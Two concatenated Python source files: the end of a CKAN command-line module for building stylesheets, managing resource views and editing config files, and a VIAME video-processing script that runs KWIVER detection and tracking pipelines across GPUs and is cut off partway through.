@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
}
def less(self):
''' Compile less files '''
import subprocess
command = 'npm bin'
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
output = process.communicate()
directory = output[0].strip()
less_bin = os.path.join(directory, 'lessc')
root = os.path.join(os.path.dirname(__file__), '..', 'public', 'base')
root = os.path.abspath(root)
custom_less = os.path.join(root, 'less', 'custom.less')
for color in self.custom_css:
f = open(custom_less, 'w')
f.write(self.custom_css[color])
f.close()
self.compile_less(root, less_bin, color)
f = open(custom_less, 'w')
f.write('// This file is needed in order for ./bin/less to compile in less 1.3.1+\n')
f.close()
self.compile_less(root, less_bin, 'main')
def compile_less(self, root, less_bin, color):
print 'compile %s.css' % color
import subprocess
main_less = os.path.join(root, 'less', 'main.less')
main_css = os.path.join(root, 'css', '%s.css' % color)
command = '%s %s %s' % (less_bin, main_less, main_css)
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
output = process.communicate()
class FrontEndBuildCommand(CkanCommand):
'''Creates and minifies css and JavaScript files
Usage:
paster front-end-build
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 0
def command(self):
self._load_config()
# Less css
cmd = LessCommand('less')
cmd.command()
# js translation strings
cmd = TranslationsCommand('trans')
cmd.options = self.options
cmd.args = ('js',)
cmd.command()
# minification
cmd = MinifyCommand('minify')
cmd.options = self.options
root = os.path.join(os.path.dirname(__file__), '..', 'public', 'base')
root = os.path.abspath(root)
ckanext = os.path.join(os.path.dirname(__file__), '..', '..', 'ckanext')
ckanext = os.path.abspath(ckanext)
cmd.args = (root, ckanext)
cmd.command()
class ViewsCommand(CkanCommand):
'''Manage resource views.
Usage:
paster views create all - Create views for all types.
paster views create [type1] [type2] ... - Create views for specified types.
paster views clean - Permanently delete views for all types no longer in the configuration file.
Supported types are "pdf", "text", "webpage", "image" and "grid". Make
sure the relevant plugins are loaded for the following types, otherwise
an error will be raised:
* "grid"-> "recline_grid_view"
* "pdf" -> "pdf_view"
* "text -> "text_view"
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 1
def command(self):
self._load_config()
if not self.args:
print self.usage
elif self.args[0] == 'create':
self.create_views(self.args[1:])
elif self.args[0] == 'clean':
self.clean_views()
else:
print self.usage
def create_views(self, view_types):
supported_types = ['grid', 'text', 'webpage', 'pdf', 'image']
if not view_types:
print self.usage
return
if view_types[0] == 'all':
view_types = supported_types
else:
for view_type in view_types:
if view_type not in supported_types:
print 'View type {view} not supported in this command'.format(view=view_type)
return
for view_type in view_types:
create_function_name = 'create_%s_views' % view_type
create_function = getattr(self, create_function_name)
create_function()
def clean_views(self):
names = []
for plugin in p.PluginImplementations(p.IResourceView):
names.append(str(plugin.info()['name']))
results = model.ResourceView.get_count_not_in_view_types(names)
if not results:
print 'No resource views to delete'
return
        print 'This command will delete the following resource views:\n'
for row in results:
print '%s of type %s' % (row[1], row[0])
result = query_yes_no('Do you want to delete these resource views:', default='no')
if result == 'no':
print 'Not Deleting.'
return
model.ResourceView.delete_not_in_view_types(names)
model.Session.commit()
print 'Deleted resource views.'
def create_text_views(self):
if not p.plugin_loaded('text_view'):
print 'Please enable the text_view plugin to make the text views.'
return
if not p.plugin_loaded('resource_proxy'):
print 'Please enable the resource_proxy plugin to make the text views.'
return
print 'Text resource views are being created'
import ckanext.textview.plugin as textplugin
formats = tuple(textplugin.DEFAULT_TEXT_FORMATS + textplugin.DEFAULT_XML_FORMATS +
textplugin.DEFAULT_JSON_FORMATS + textplugin.DEFAULT_JSONP_FORMATS)
resources = model.Resource.get_all_without_views(formats)
user = logic.get_action('get_site_user')({'model': model, 'ignore_auth': True}, {})
context = {'model': model, 'session': model.Session, 'user': user['name']}
count = 0
for resource in resources:
count += 1
resource_view = {'title': 'Text View',
'description': 'View of the {format} file'.format(
format=resource.format.upper()),
'resource_id': resource.id,
'view_type': 'text'}
logic.get_action('resource_view_create')(context, resource_view)
print '%s text resource views created!' % count
def create_image_views(self):
import ckanext.imageview.plugin as imagevewplugin
formats = tuple(imagevewplugin.DEFAULT_IMAGE_FORMATS)
print 'Image resource views are being created'
resources = model.Resource.get_all_without_views(formats)
user = logic.get_action('get_site_user')({'model': model, 'ignore_auth': True}, {})
context = {'model': model, 'session': model.Session, 'user': user['name']}
count = 0
for resource in resources:
count += 1
resource_view = {'title': 'Resource Image',
'description': 'View of the Image',
'resource_id': resource.id,
'view_type': 'image'}
logic.get_action('resource_view_create')(context, resource_view)
print '%s image resource views created!' % count
def create_webpage_views(self):
formats = tuple(['html', 'htm'])
print 'Web page resource views are being created'
resources = model.Resource.get_all_without_views(formats)
user = logic.get_action('get_site_user')({'model': model, 'ignore_auth': True}, {})
context = {'model': model, 'session': model.Session, 'user': user['name']}
count = 0
for resource in resources:
count += 1
resource_view = {'title': 'Web Page View',
'description': 'View of the webpage',
'resource_id': resource.id,
'view_type': 'webpage'}
logic.get_action('resource_view_create')(context, resource_view)
print '%s webpage resource views created!' % count
def create_pdf_views(self):
if not p.plugin_loaded('pdf_view'):
print 'Please enable the pdf_view plugin to make the PDF views.'
return
if not p.plugin_loaded('resource_proxy'):
print 'Please enable the resource_proxy plugin to make the PDF views.'
return
print 'PDF resource views are being created'
resources = model.Resource.get_all_without_views(['pdf'])
user = logic.get_action('get_site_user')({'model': model, 'ignore_auth': True}, {})
context = {'model': model, 'session': model.Session, 'user': user['name']}
count = 0
for resource in resources:
count += 1
resource_view = {'title': 'PDF View',
'description': 'PDF view of the resource.',
'resource_id': resource.id,
'view_type': 'pdf'}
logic.get_action('resource_view_create')(context, resource_view)
print '%s pdf resource views created!' % count
def create_grid_views(self):
import ckan.plugins.toolkit as toolkit
import ckanext.datastore.db as db
import pylons
if not p.plugin_loaded('datastore'):
print 'The datastore plugin needs to be enabled to generate the grid views.'
return
if not p.plugin_loaded('recline_grid_view'):
print 'Please enable the recline_grid_view plugin to make the grid views.'
return
print 'Grid resource views are being created'
user = logic.get_action('get_site_user')({'model': model, 'ignore_auth': True}, {})
context = {'model': model, 'session': model.Session, 'user': user['name']}
data_dict = {}
data_dict['connection_url'] = pylons.config['ckan.datastore.write_url']
resources_sql = sa.text(u'''SELECT name FROM "_table_metadata"
WHERE alias_of is null''')
results = db._get_engine(data_dict).execute(resources_sql)
count = 0
for row in results:
try:
res = logic.get_action('resource_view_list')(context, {'id': row[0]})
except toolkit.ObjectNotFound:
continue
if res:
continue
count += 1
resource_view = {'resource_id': row[0],
'view_type': 'recline_grid_view',
'title': 'Grid view',
'description': 'View of data within the DataStore'}
logic.get_action('resource_view_create')(context, resource_view)
print '%s grid resource views created!' % count
class ConfigToolCommand(paste.script.command.Command):
'''Tool for editing options in a CKAN config file
paster config-tool <default.ini> <key>=<value> [<key>=<value> ...]
paster config-tool <default.ini> -f <custom_options.ini>
Examples:
paster config-tool default.ini sqlalchemy.url=123 'ckan.site_title=ABC'
paster config-tool default.ini -s server:main -e port=8080
paster config-tool default.ini -f custom_options.ini
'''
parser = paste.script.command.Command.standard_parser(verbose=True)
default_verbosity = 1
group_name = 'ckan'
usage = __doc__
summary = usage.split('\n')[0]
parser.add_option('-s', '--section', dest='section',
default='app:main', help='Section of the config file')
parser.add_option(
'-e', '--edit', action='store_true', dest='edit', default=False,
help='Checks the option already exists in the config file')
parser.add_option(
'-f', '--file', dest='merge_filepath', metavar='FILE',
help='Supply an options file to merge in')
def command(self):
import config_tool
if len(self.args) < 1:
self.parser.error('Not enough arguments (got %i, need at least 1)'
% len(self.args))
config_filepath = self.args[0]
if not os.path.exists(config_filepath):
self.parser.error('Config filename %r does not exist.' %
config_filepath)
if self.options.merge_filepath:
config_tool.config_edit_using_merge_file(
config_filepath, self.options.merge_filepath)
options = self.args[1:]
if not (options or self.options.merge_filepath):
self.parser.error('No options provided')
if options:
for option in options:
if '=' not in option:
sys.stderr.write(
'An option does not have an equals sign: %r '
'It should be \'key=value\'. If there are spaces '
'you\'ll need to quote the option.\n' % option)
sys.exit(1)
try:
config_tool.config_edit_using_option_strings(
config_filepath, options, self.options.section,
edit=self.options.edit)
except config_tool.ConfigToolError, e:
sys.stderr.write(e.message)
sys.exit(1)
|
process_video.py
|
#!/usr/bin/env python
import sys
import os
import shutil
import math
import numpy as np
import argparse
import contextlib
import itertools
import signal
import subprocess
import tempfile
import threading
try:
import queue # Python 3
except ImportError:
import Queue as queue # Python 2
sys.dont_write_bytecode = True
import database_tool
# Character short-cuts and global constants
if os.name == 'nt':
div = '\\'
else:
div = '/'
lb = '\n'
lb1 = lb
lb2 = lb * 2
lb3 = lb * 3
detection_ext = "_detections.csv"
track_ext = "_tracks.csv"
default_pipeline = "pipelines" + div + "index_default.pipe"
no_pipeline = "none"
# Global flag to see if any video has successfully completed processing
any_video_complete = False
# Helpers to list files with a given extension in a directory
def list_files_in_dir( folder ):
if not os.path.exists( folder ) and os.path.exists( folder + ".lnk" ):
folder = folder + ".lnk"
folder = folder if not os.path.islink( folder ) else os.readlink( folder )
if not os.path.isdir( folder ):
exit_with_error( "Input folder \"" + folder + "\" does not exist" )
return [
os.path.join( folder, f ) for f in sorted( os.listdir( folder ) )
if not f.startswith('.')
]
def list_files_in_dir_w_ext( folder, extension ):
return [ f for f in list_files_in_dir( folder ) if f.endswith( extension ) ]
def has_valid_ext( f, ext_list ):
for ext in ext_list:
if f.lower().endswith( ext ):
return True
return False
def has_file_with_extension( folder, extension ):
for filename in list_files_in_dir_w_ext( folder, extension ):
if filename.endswith( extension ):
return True
return False
def list_files_in_dir_w_exts( folder, extensions ):
ext_list = extensions.split(";")
return [ f for f in list_files_in_dir( folder ) if has_valid_ext( f, ext_list ) ]
def list_videos_in_dir( folder, extensions ):
files = list_files_in_dir_w_exts( folder, extensions )
if len( files ) == 0:
files = [ f for f in list_files_in_dir( folder ) if os.path.isdir( f ) ]
if len( files ) == 0:
files = list_files_in_dir( folder )
return files
# Default message logging
def log_info( msg ):
sys.stdout.write( msg )
sys.stdout.flush()
# Create a directory if it doesn't exist
def create_dir( dirname, logging=True, recreate=False, prompt=True ):
if dirname == '.' or dirname == "":
return
if recreate:
if os.path.exists( dirname ):
if not prompt or database_tool.query_yes_no( lb1 + "Reset folder: " + dirname + "?" ):
if logging:
log_info( "Removing " + dirname + lb )
shutil.rmtree( dirname )
elif prompt:
sys.exit(0)
else:
log_info( lb )
if not os.path.exists( dirname ):
if logging:
log_info( "Creating " + dirname + lb )
os.makedirs( dirname )
CUDA_VISIBLE_DEVICES = "CUDA_VISIBLE_DEVICES"
def get_real_gpu_index(n):
"""Return the real index for the nth GPU as a string. This respects
CUDA_VISIBLE_DEVICES
"""
cvd = os.environ.get( CUDA_VISIBLE_DEVICES )
if not cvd: # Treat empty string and None the same
return str(n)
# This is an attempt to respect the fact that an invalid index hides
# the GPUs listed after it
cvd_parsed = list( itertools.takewhile( lambda i: not i.startswith('-'),
cvd.split(',') ) )
if 0 <= n < len( cvd_parsed ):
return cvd_parsed[n]
else:
raise IndexError('Only {} visible GPUs; you asked for number {}!'
.format( len( cvd_parsed ), n) )
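# Illustrative sketch (not part of the original script): how get_real_gpu_index()
# maps logical GPU indices onto CUDA_VISIBLE_DEVICES. The env value used here is an
# assumption for demonstration only; the original environment is restored afterwards.
def _demo_gpu_index_mapping():
  saved = os.environ.get( CUDA_VISIBLE_DEVICES )
  os.environ[ CUDA_VISIBLE_DEVICES ] = "2,5,-1,7"
  try:
    # Logical GPU 0 -> "2" and logical GPU 1 -> "5"; "7" is hidden behind the
    # invalid "-1" entry, so asking for GPU 2 would raise IndexError.
    return [ get_real_gpu_index( n ) for n in range( 2 ) ]
  finally:
    if saved is None:
      del os.environ[ CUDA_VISIBLE_DEVICES ]
    else:
      os.environ[ CUDA_VISIBLE_DEVICES ] = saved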
def execute_command( cmd, stdout=None, stderr=None, gpu=None ):
if gpu is None:
env = None
else:
env = dict(os.environ)
env[ CUDA_VISIBLE_DEVICES ] = get_real_gpu_index( gpu )
return subprocess.call( cmd, stdout=stdout, stderr=stderr, env=env )
def get_script_path():
return os.path.dirname( os.path.realpath( sys.argv[0] ) )
def get_pipeline_cmd( debug=False ):
if os.name == 'nt':
if debug:
return [ 'kwiver.exe', 'runner' ]
else:
return [ 'kwiver.exe', 'runner' ]
else:
if debug:
return [ 'gdb', '--args', 'kwiver', 'runner' ]
else:
return [ 'kwiver', 'runner' ]
def exit_with_error( error_str, force=False ):
log_info( lb1 + 'ERROR: ' + error_str + lb2 )
# Kill this process to end all threads
if not isinstance( threading.current_thread(), threading._MainThread ):
if os.name == 'nt':
os.kill( os.getpid(), signal.SIGTERM )
else:
os.kill( os.getpid(), signal.SIGKILL )
# Default exit case, if main thread
sys.exit(0)
def check_file( filename ):
if not os.path.exists( filename ):
exit_with_error( "Unable to find: " + filename )
return filename
@contextlib.contextmanager
def get_log_output_files( output_prefix ):
if os.name == 'nt':
with open( output_prefix + '.out.txt', 'w' ) as fo, \
open( output_prefix + '.err.txt', 'w' ) as fe:
yield dict( stdout=fo, stderr=fe)
else:
with open( output_prefix + '.txt', 'w' ) as fo:
yield dict( stdout=fo, stderr=fo )
def find_file( filename ):
if( os.path.exists( filename ) ):
return filename
elif os.path.exists( get_script_path() + div + filename ):
return get_script_path() + div + filename
else:
exit_with_error( "Unable to find " + filename )
def make_filelist_for_dir( input_dir, output_dir, output_name ):
# The most common extension in the folder is most likely images.
# Sometimes people have small text files alongside the images
# so just choose the most common filetype.
exts = dict()
files = dict()
for f in sorted( os.listdir( input_dir ) ):
f_fp = os.path.join( input_dir, f )
if os.path.isfile( f_fp ):
_, ext = os.path.splitext( f )
if ext in exts:
exts[ext] += 1
files[ext].append( f_fp )
else:
exts[ext] = 1
files[ext] = [ f_fp ]
if len(exts) == 0:
return ""
top_ext = sorted( exts, key=exts.get, reverse=True )[0]
# Write out list to file
output_file = os.path.join( output_dir, output_name + ".txt" )
fout = open( output_file, "w" )
for f in files[top_ext]:
    fout.write( os.path.abspath( f ) + lb1 )
fout.close()
return output_file
# Other helpers
def signal_handler( signal, frame ):
log_info( lb1 )
exit_with_error( 'Processing aborted, see you next time' )
def file_length( filename ):
if not os.path.exists( filename ):
exit_with_error( filename + " does not exist" )
with open( filename, 'r' ) as f:
for i, l in enumerate( f ):
pass
return i + 1
def split_image_list( image_list_file, n, dir ):
"""Create and return the paths to n temp files that when appended
reproduce the original file. The names are created
deterministically like "orig_name_part0.ext", "orig_name_part1.ext",
etc., but with the original name used as is when n == 1.
Existing files with the same names are overwritten without question.
Deleting the files is the responsibility of the caller.
"""
input_basename = os.path.basename( image_list_file )
if n == 1:
new_file_names = [ input_basename ]
else:
prefix, suffix = os.path.splitext( input_basename )
num_width = len( str( n - 1 ) )
new_file_names = [
prefix + '_part{:0{}}'.format( i, num_width ) + suffix
for i in range( n )
]
new_file_names = [ os.path.join( dir, fn ) for fn in new_file_names ]
try:
# Build manually to have the intermediate state in case of error
temp_files = []
divisor = math.floor( file_length( image_list_file ) / n ) + 1
for fn in new_file_names:
temp_files.append( open( fn, 'w' ) )
with open( image_list_file ) as f:
for i, line in enumerate( f ):
temp_index = int( math.floor( i / divisor ) )
temp_files[ temp_index ].write( line )
finally:
for f in temp_files:
f.close()
return new_file_names
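# Illustrative sketch (not part of the original script): the deterministic part names
# produced by split_image_list() for a given list file and part count, without
# touching the filesystem. The sample filename is an assumption.
def _demo_part_names( image_list_file="frames.txt", n=3 ):
  prefix, suffix = os.path.splitext( os.path.basename( image_list_file ) )
  num_width = len( str( n - 1 ) )
  # For n=3 this yields: frames_part0.txt, frames_part1.txt, frames_part2.txt
  return [ prefix + '_part{:0{}}'.format( i, num_width ) + suffix
           for i in range( n ) ]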
def fset( setting_str ):
return ['-s', setting_str]
def video_output_settings_list( options, basename ):
output_dir = options.output_directory
return list(itertools.chain(
fset( 'detector_writer:file_name=' + output_dir + div + basename + detection_ext ),
fset( 'track_writer:file_name=' + output_dir + div + basename + track_ext ),
fset( 'track_writer:stream_identifier=' + basename ),
fset( 'track_writer_db:writer:db:video_name=' + basename ),
fset( 'track_writer_kw18:file_name=' + output_dir + div + basename + '.kw18' ),
fset( 'descriptor_writer_db:writer:db:video_name=' + basename ),
fset( 'track_descriptor:uid_basename=' + basename ),
fset( 'kwa_writer:output_directory=' + output_dir ),
fset( 'kwa_writer:base_filename=' + basename ),
fset( 'kwa_writer:stream_id=' + basename ),
))
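# Illustrative sketch (not part of the original script): how fset() and
# itertools.chain build the flat "-s key=value" argument list passed to the kwiver
# runner. The output directory and basename are assumptions for demonstration.
def _demo_settings_args( output_dir=".", basename="example_video" ):
  args = list( itertools.chain(
    fset( 'detector_writer:file_name=' + output_dir + div + basename + detection_ext ),
    fset( 'track_writer:stream_identifier=' + basename ),
  ))
  # On a POSIX system args is:
  #   [ '-s', 'detector_writer:file_name=./example_video_detections.csv',
  #     '-s', 'track_writer:stream_identifier=example_video' ]
  return args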
def plot_settings_list( options, basename ):
output_dir = options.output_directory
return list(itertools.chain(
fset( 'detector_writer:file_name=' + output_dir + div + basename + detection_ext ),
fset( 'kwa_writer:output_directory=' + output_dir ),
fset( 'kwa_writer:base_filename=' + basename ),
fset( 'kwa_writer:stream_id=' + basename ),
))
def archive_dimension_settings_list( options ):
if len( options.archive_width ) > 0:
return list(itertools.chain(
fset( 'kwa_writer:fixed_col_count=' + options.archive_width ),
fset( 'kwa_writer:fixed_row_count=' + options.archive_height ),
))
return []
def object_detector_settings_list( options ):
if len( options.detection_threshold ) > 0:
return list( itertools.chain(
fset( 'detector:detector:darknet:thresh=' + options.detection_threshold ),
fset( 'detector1:detector:darknet:thresh=' + options.detection_threshold ),
fset( 'detector2:detector:darknet:thresh=' + options.detection_threshold ),
fset( 'detector_filter:filter:class_probablity_filter:threshold=' + options.detection_threshold ),
))
return []
def object_tracker_settings_list( options ):
if len( options.tracker_threshold ) > 0:
return list( itertools.chain(
fset( 'track_initializer:track_initializer:threshold:'
'filter:class_probablity_filter:threshold=' + options.tracker_threshold ),
fset( 'tracker:detection_select_threshold=' + options.tracker_threshold ),
))
return []
def video_frame_rate_settings_list( options ):
output = []
if len( options.input_frame_rate ) > 0:
output += fset( 'input:frame_time=' + str( 1.0 / float( options.input_frame_rate ) ) )
if len( options.frame_rate ) > 0:
output += fset( 'downsampler:target_frame_rate=' + options.frame_rate )
if len( options.batch_size ) > 0:
output += fset( 'downsampler:burst_frame_count=' + options.batch_size )
if len( options.batch_skip ) > 0:
output += fset( 'downsampler:burst_frame_break=' + options.batch_skip )
return output
def groundtruth_reader_settings_list( options, gt_files, basename, gpu_id, gt_type ):
output = []
if len( gt_files ) == 0:
exit_with_error( "Directory " + basename + " contains no GT files" )
elif len( gt_files ) > 1:
exit_with_error( "Directory " + basename + " contains multiple GT files" )
else:
if gpu_id > 0:
output_extension = str( gpu_id ) + '.lbl'
else:
output_extension = 'lbl'
lbl_file = options.input_dir + "/labels.txt"
if not os.path.exists( lbl_file ):
lbl_file = "labels.txt"
output += fset( 'detection_reader:file_name=' + gt_files[0] )
output += fset( 'detection_reader:reader:type=' + gt_type )
output += fset( 'write_descriptor_ids:category_file=' + lbl_file )
output += fset( 'write_descriptor_ids:output_directory=' + options.output_directory )
output += fset( 'write_descriptor_ids:output_extension=' + output_extension )
return output
def remove_quotes( input_str ):
return input_str.replace( "\"", "" )
def add_final_list_csv( args, video_list ):
if len( video_list ) == 0:
return
for video in video_list:
if video.endswith( "_part0.txt" ):
output_file = video_list[0].replace( "_part0.txt", detection_ext )
output_stream = open( output_file, "w" )
id_adjustment = 0
is_first = True
used_ids = set()
last_id = 0
input_stream = open( video.replace( ".txt", detection_ext ), "r" )
id_mappings = dict()
for line in input_stream:
if len( line ) > 0 and ( line[0] == '#' or line[0:9] == 'target_id' ):
if is_first:
output_stream.write( line )
continue
parsed_line = line.rstrip().split(',')
if len( parsed_line ) < 2:
continue
orig_id = int( parsed_line[0] )
if orig_id in id_mappings:
final_id = id_mappings[ orig_id ]
elif orig_id in used_ids:
last_id = last_id + 1
final_id = last_id
id_mappings[ orig_id ] = final_id
used_ids.add( final_id )
else:
final_id = orig_id
id_mappings[ orig_id ] = orig_id
used_ids.add( orig_id )
last_id = max( last_id, final_id )
parsed_line[0] = str( final_id )
parsed_line[2] = str( int( parsed_line[2] ) + id_adjustment )
output_stream.write( ','.join( parsed_line ) + '\n' )
id_adjustment = id_adjustment + file_length( video )
input_stream.close()
is_first = False
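# Illustrative sketch (not part of the original script): the track-ID remapping that
# add_final_list_csv() applies when merging per-part CSVs, shown on plain integers.
def _demo_remap_ids( id_sequences=( ( 1, 2 ), ( 1, ) ) ):
  used_ids = set()
  last_id = 0
  merged = []
  for part in id_sequences:
    id_mappings = dict()
    for orig_id in part:
      if orig_id in id_mappings:
        final_id = id_mappings[ orig_id ]
      elif orig_id in used_ids:
        # Collides with an ID already used by an earlier part: assign a fresh ID.
        last_id = last_id + 1
        final_id = last_id
        id_mappings[ orig_id ] = final_id
        used_ids.add( final_id )
      else:
        final_id = orig_id
        id_mappings[ orig_id ] = orig_id
        used_ids.add( orig_id )
      last_id = max( last_id, final_id )
      merged.append( final_id )
  return merged  # [ 1, 2, 3 ]: the second part's track 1 is renumbered to 3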
# Process a single video
def process_video_kwiver( input_name, options, is_image_list=False, base_ovrd='',
cpu=0, gpu=None, write_track_time=True ):
if gpu is None:
gpu = 0
multi_threaded = ( options.gpu_count * options.pipes > 1 )
auto_detect_gt = ( len( options.auto_detect_gt ) > 0 )
input_basename = os.path.basename( input_name )
input_ext = os.path.splitext( input_name )[1]
if multi_threaded:
log_info( 'Processing: {} on GPU {}'.format( input_basename, gpu ) + lb1 )
else:
log_info( 'Processing: {} on GPU... '.format( input_basename ) )
# Get video name without extension and full path
if len( base_ovrd ) > 0:
basename_no_ext = base_ovrd
else:
basename_no_ext = os.path.splitext( input_basename )[0]
# Formulate input setting string
if auto_detect_gt:
if options.auto_detect_gt == 'habcam' or 'csv' in options.auto_detect_gt:
gt_ext = '.csv'
elif options.auto_detect_gt[0] != '.':
gt_ext = '.' + options.auto_detect_gt
else:
gt_ext = options.auto_detect_gt
if not is_image_list and \
( input_ext == '.csv' or input_ext == '.txt' or input_name == "__pycache__" ):
if multi_threaded:
log_info( 'Skipped {} on GPU {}'.format( input_basename, gpu ) + lb1 )
else:
log_info( 'Skipped' + lb1 )
return
elif not os.path.exists( input_name ):
if multi_threaded:
log_info( 'Skipped {} on GPU {}'.format( input_basename, gpu ) + lb1 )
else:
log_info( 'Skipped' + lb1 )
return
elif os.path.isdir( input_name ):
if auto_detect_gt:
gt_files = list_files_in_dir_w_ext( input_name, gt_ext )
input_name = make_filelist_for_dir( input_name, options.output_directory, basename_no_ext )
if len( input_name ) == 0:
if multi_threaded:
log_info( 'Skipped {} on GPU {}'.format( input_basename, gpu ) + lb1 )
else:
log_info( 'Skipped' + lb1 )
return
is_image_list = True
elif auto_detect_gt:
input_path = os.path.dirname( os.path.abspath( input_name ) )
gt_files = list_files_in_dir_w_ext( input_path, gt_ext )
# Formulate command
input_settings = fset( 'input:video_filename=' + input_name )
if not is_image_list:
input_settings += fset( 'input:video_reader:type=vidl_ffmpeg' )
elif options.ts_from_file:
input_settings += fset( 'input:video_reader:type=add_timestamp_from_filename' )
command = ( get_pipeline_cmd( options.debug ) +
[ find_file( options.pipeline ) ] +
input_settings )
command += video_frame_rate_settings_list( options )
command += video_output_settings_list( options, basename_no_ext )
command += archive_dimension_settings_list( options )
command += object_detector_settings_list( options )
command += object_tracker_settings_list( options )
if options.write_svm_info and not auto_detect_gt:
if len( options.input_detections ) == 0:
exit_with_error( "Input detections must be specified to write out svm header info" )
if not os.path.exists( options.input_detections ):
exit_with_error( "Unable to find input detections" )
gt_files = [ options.input_detections ]
if auto_detect_gt or options.write_svm_info:
gt_type = options.auto_detect_gt if auto_detect_gt else "viame_csv"
command += groundtruth_reader_settings_list( options, gt_files, basename_no_ext, gpu, gt_type )
if write_track_time:
command += fset( 'track_writer:writer:viame_csv:write_time_as_uid=true' )
else:
command += fset( 'track_writer:writer:viame_csv:stream_identifier=' + input_basename )
if len( options.input_detections ) > 0:
command += fset( "detection_reader:file_name=" + options.input_detections )
try:
if len( options.extra_settings ) > 0:
for extra_option in options.extra_settings:
command += fset( " ".join( extra_option ) )
except:
pass
# Process command, possibly with logging
log_base = ""
if len( options.log_directory ) > 0 and not options.debug and options.log_directory != "PIPE":
log_base = options.output_directory + div + options.log_directory + div + basename_no_ext
with get_log_output_files( log_base ) as kwargs:
res = execute_command( command, gpu=gpu, **kwargs )
else:
res = execute_command( command, gpu=gpu )
global any_video_complete
if res == 0:
if multi_threaded:
log_info( 'Completed: {} on GPU {}'.format( input_basename, gpu ) + lb1 )
else:
log_info( 'Success' + lb1 )
any_video_complete = True
else:
if multi_threaded:
      log_info( 'Failure: {} on GPU {}'.format( input_basename, gpu ) + lb1 )
else:
log_info( 'Failure' + lb1 )
if res == -11:
s = os.statvfs( options.output_directory )
if s.f_bavail * s.f_frsize < 100000000:
exit_with_error( lb1 + 'Out of disk space. Clean up space and then re-run.' )
log_info( lb1 + 'Pipeline failed with code 11. This is typically indicative of an '
'issue with system resources, e.g. low disk space or running out of '
'memory, but could be indicative of a pipeline issue. It\'s also possible '
'the pipeline you are running just had a shutdown issue. Attempting to '
'continue processing.' + lb1 )
any_video_complete = True
if not any_video_complete:
if len( log_base ) > 0:
exit_with_error( 'Processing failed, check ' + log_base + '.txt, terminating.' )
else:
exit_with_error( 'Processing failed, terminating.' )
elif len( log_base ) > 0:
log_info( lb1 + 'Check ' + log_base + '.txt for error messages' + lb2 )
# Main Function
if __name__ == "__main__" :
parser = argparse.ArgumentParser(description="Process new videos",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("-v", dest="input_video", default="",
help="Input single video to process")
parser.add_argument("-d", dest="input_dir", default="",
help="Input directory of videos or image folders to process")
parser.add_argument("-l", dest="input_list", default="",
help="Input list of image files to process")
parser.add_argument("-p", dest="pipeline", default=default_pipeline,
help="Input pipeline for processing video or image data")
parser.add_argument("-s", dest="extra_settings", action='append', nargs='*',
help="Extra command line arguments for the pipeline runner")
parser.add_argument("-id", dest="input_detections", default="",
help="Input detections around which to create descriptors")
parser.add_argument("-o", dest="output_directory", default=".",
help="Output directory to store files in")
parser.add_argument("-logs", dest="log_directory", default="logs",
help="Output sub-directory for log files, if empty will not use files")
parser.add_argument("-video-exts", dest="video_exts", default="3qp;3g2;amv;asf;avi;drc;gif;gifv;"
"f4v;f4p;f4a;f4bflv;m4v;mkv;mp4;m4p;m4v;mpg;mpg2;mp2;mpeg;mpe;mpv;mng;mts;"
"m2ts;mov;mxf;nsv;ogg;ogv;qt;roq;rm;rmvb;svi;webm;wmv;vob;yuv",
help="Allowable video extensions")
parser.add_argument("-image-exts", dest="image_exts", default="bmp;dds;gif;heic;jpg;jpeg;png;psd;"
"psp;pspimage;tga;thm;tif;tiff;yuv",
help="Allowable image extensions")
parser.add_argument("-frate", dest="frame_rate", default="",
help="Processing frame rate over-ride to process videos at, specified "
"in hertz (frames per second)" )
parser.add_argument("-fbatch", dest="batch_size", default="",
help="Optional number of frames to process in batches")
parser.add_argument("-fskip", dest="batch_skip", default="",
help="If batching frames, number of frames to skip between batches")
parser.add_argument("-ifrate", dest="input_frame_rate", default="",
help="Input frame rate over-ride to process videos at. This is useful "
"for specifying the frame rate of input image lists, which typically "
"don't have frame rates")
parser.add_argument("-detection-threshold", dest="detection_threshold", default="",
help="Optional detection threshold over-ride parameter")
parser.add_argument("-tracker-threshold", dest="tracker_threshold", default="",
help="Optional tracking threshold over-ride parameter")
parser.add_argument("-archive-height", dest="archive_height", default="",
help="Advanced: Optional video archive height over-ride")
parser.add_argument("-archive-width", dest="archive_width", default="",
help="Advanced: Optional video archive width over-ride")
parser.add_argument("-gpus", "--gpu-count", default=1, type=int, metavar='N',
help="Parallelize the ingest by using the first N GPUs in parallel")
parser.add_argument("-pipes-per-gpu", "--pipes", default=1, type=int, metavar='N',
help="Parallelize the ingest by using the first N GPUs in parallel")
parser.add_argument("--detection-plots", dest="detection_plots", action="store_true",
help="Produce per-video detection plot summaries")
parser.add_argument("--track-plots", dest="track_plots", action="store_true",
help="Produce per-video track plot summaries")
parser.add_argument("-plot-objects", dest="objects", default="fish",
help="Objects to generate plots for")
parser.add_argument("-plot-threshold", dest="plot_threshold", default=0.25, type=float,
help="Threshold to generate plots for")
parser.add_argument("-plot-smooth", dest="smooth", default=1, type=int,
help="Smoothing factor for plots")
parser.add_argument("-auto-detect-gt", dest="auto_detect_gt", default="",
help="Automatically pass to pipes GT of this type if present")
parser.add_argument("--init-db", dest="init_db", action="store_true",
help="Re-initialize database")
parser.add_argument("--build-index", dest="build_index", action="store_true",
help="Build searchable index on completion")
parser.add_argument("--ball-tree", dest="ball_tree", action="store_true",
help="Use a ball tree for the searchable index")
parser.add_argument("--no-reset-prompt", dest="no_reset_prompt", action="store_true",
help="Don't prompt if the output folder should be reset")
parser.add_argument("--ts-from-file", dest="ts_from_file", action="store_true",
help="Attempt to retrieve timestamps from image filenames.")
parser.add_argument("--write-svm-info", dest="write_svm_info", action="store_true",
help="Write out header information used for training SVMs")
parser.add_argument("--debug", dest="debug", action="store_true",
help="Run with debugger attached to process")
parser.add_argument("-install", dest="install_dir", default="",
help="Optional install dir over-ride for all application "
"binaries. If this is not specified, it is expected that all "
"viame binaries are already in our path.")
args = parser.parse_args()
# Assorted error checking up front
process_data = True
